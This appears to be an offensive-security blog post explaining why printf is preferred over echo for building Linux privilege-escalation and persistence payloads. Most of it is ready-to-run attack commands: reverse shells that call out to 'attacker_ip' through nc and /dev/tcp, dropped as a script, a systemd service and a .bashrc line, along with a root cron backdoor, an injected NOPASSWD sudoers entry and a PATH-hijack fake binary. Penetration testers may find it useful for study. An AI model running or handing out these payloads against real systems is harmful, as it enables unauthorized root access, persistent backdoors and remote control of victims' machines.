/ Linux Privesc, Uncategorized / By

printf for Payloads:

When it comes to crafting precise payloads or writing malicious scripts on-the-fly, one tool stands above echo in both control and reliability — the mighty printf. It’s clean, it’s predictable, and it doesn’t flinch at escape characters or strange input. As pentesters, we often find ourselves needing to generate scripts, inject payloads, or build files that execute exactly what we intend. This is where printf shines.

Why Use printf Over echo

echo can be quirky. It’s inconsistent between shells, often mishandles escape characters like \n, and doesn’t give you control over formatting. printf behaves the same across the board — making it ideal for precision payload creation.

Example:

echo "line1\nline2"
# Output: line1\nline2  ← not what you wanted

printf "line1\nline2"
# Output:
# line1
# line2

Payload Crafting with printf

Let’s walk through some practical and commonly used scenarios where printf becomes a core weapon during exploitation and privilege escalation.

1. Creating Malicious Shell Scripts

printf '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444\n' > /tmp/rev.sh
chmod +x /tmp/rev.sh

This drops a simple reverse shell script into /tmp. You can then execute it manually or abuse a misconfigured cronjob to trigger it.

2. Modifying sudoers (Privilege Escalation)

If you can get a script executed as root, use printf to inject yourself into /etc/sudoers:

printf '#!/bin/bash\necho "student ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers\n' > /opt/escalate.sh
chmod +x /opt/escalate.sh

Now, executing /opt/escalate.sh as root gives your user full sudo rights with no password prompt.

3. Systemd Service Dropper

printf "[Unit]\nDescription=Reverse Shell\n\n[Service]\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\n\n[Install]\nWantedBy=multi-user.target\n" > /etc/systemd/system/pwn.service

If you can write to /etc/systemd/system, this drops a malicious service that opens a reverse shell when started.

4. Injecting Into .bashrc for Persistence

printf '\n/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1\n' >> ~/.bashrc

This appends a reverse shell that triggers every time the user spawns a shell.

5. Creating Cronjob Payloads

printf '* * * * * root /tmp/rev.sh\n' > /etc/cron.d/rootbackdoor

If /etc/cron.d is writable, this will get executed every minute.

6. Binary Hijack Payload Script

If you discover a PATH hijack vulnerability (e.g., root runs backup from an untrusted location), use printf to craft the fake binary:

printf '#!/bin/bash\n/bin/bash\n' > /tmp/backup
chmod +x /tmp/backup

Drop it into a writable PATH directory and wait for execution.

Useful Formatting in Payloads

  • \n – newline
  • \t – tab
  • %s – string format
  • %d – integer format
  • %x – hex format

You can combine these for fine control:

printf "Username:\t%s\nPassword:\t%s\n" "$USER" "hunter2"

Final Thoughts

printf is an essential payload construction tool. It’s the stealth scalpel compared to the sledgehammer that is echo. Whether you’re creating a reverse shell, manipulating system files, or dropping persistence, printf gives you clean, controlled execution every time.

If you’re serious about offensive operations — drop the echo and printf like a pro.

Related Posts

Scroll to Top